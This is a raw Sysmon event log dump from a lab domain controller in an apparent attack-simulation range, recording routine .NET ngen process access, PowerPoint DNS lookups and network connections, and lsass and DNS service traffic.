14:58:44.622{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B50E-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.575{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B40E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.575{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B40E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.575{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B40E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B30E-00000000BB01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.528{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B30E-00000000BB01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.528{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B30E-00000000BB01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.513{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B20E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.497{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B20E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.497{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B20E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x800000000000000080661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.699{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496autodiscover.attackrange.local9003-C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.535{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496binaries.templates.cdn.office.net0type: 5 binaries.templates.cdn.office.net.edgesuite.net;type: 5 a1847.dscg2.akamai.net;::ffff:2.18.213.24;::ffff:2.18.213.75;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.324{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496attackrange.local0::ffff:10.0.1.14;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.273{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496metadata.templates.cdn.office.net0type: 5 templatesmetadata.office.net;type: 5 templatesmetadata.office.net.edgekey.net;type: 5 e26769.b.akamaiedge.net;::ffff:184.86.103.22;::ffff:184.86.103.7;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.171{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496autodiscover-s.outlook.com0type: 5 outlook.office365.com;type: 5 outlook.ha.office365.com;type: 5 outlook.ms-acdc.office.com;type: 5 fra-efz.ms-acdc.office.com;::ffff:40.101.19.146;::ffff:52.97.135.114;::ffff:52.97.201.98;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.152{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496win-dc-339.attackrange.local0fe80::1082:b69b:30c5:c700;::ffff:10.0.1.14;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.830{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ecs.office.com0type: 5 ecs.office.trafficmanager.net;type: 5 s-0005-office.config.skype.com;type: 5 ecs-office.s-0005.s-msedge.net;type: 5 s-0005.s-msedge.net;::ffff:52.113.194.132;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 22542200x800000000000000080654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.812{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496support.content.office.net0type: 5 support.content.office.net.edgekey.net;type: 5 e584.g.akamaiedge.net;::ffff:104.75.88.23;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 354300x800000000000000080653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.341{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-339.attackrange.local57595-false10.0.1.14win-dc-339.attackrange.local3268msft-gc 354300x800000000000000080652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.341{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57595-false10.0.1.14win-dc-339.attackrange.local3268msft-gc 354300x800000000000000080651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.317{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57593-false52.97.135.114-443https 354300x800000000000000080650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.274{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57592-false184.86.103.22a184-86-103-22.deploy.static.akamaitechnologies.com443https 354300x800000000000000080649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.267{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local61253- 354300x800000000000000080648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.178{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57591-false40.101.19.146-443https 354300x800000000000000080647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.167{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local54139- 354300x800000000000000080646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.152{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57590-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000080645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.152{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57590-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000080644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.035{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57589-false20.190.160.6-443https 354300x800000000000000080643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.897{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57584-false52.109.12.18-443https 354300x800000000000000080642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.838{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57588-false52.113.194.132-443https 354300x800000000000000080641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.828{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53854- 354300x800000000000000080640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.821{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57586-false52.109.68.46-443https 354300x800000000000000080639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.819{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57585-false52.109.88.174-443https 354300x800000000000000080638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.813{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57587-false104.75.88.23a104-75-88-23.deploy.static.akamaitechnologies.com443https 354300x800000000000000080637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.809{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53854- 354300x800000000000000080636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.809{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local60291- 354300x800000000000000080635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.806{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local59551- 354300x800000000000000080634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.806{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58160- 354300x800000000000000080633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.614{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57583-false52.109.88.177-443https 10341000x800000000000000080632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.450{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B10E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.450{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B10E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.450{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B10E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.403{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B00E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.403{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 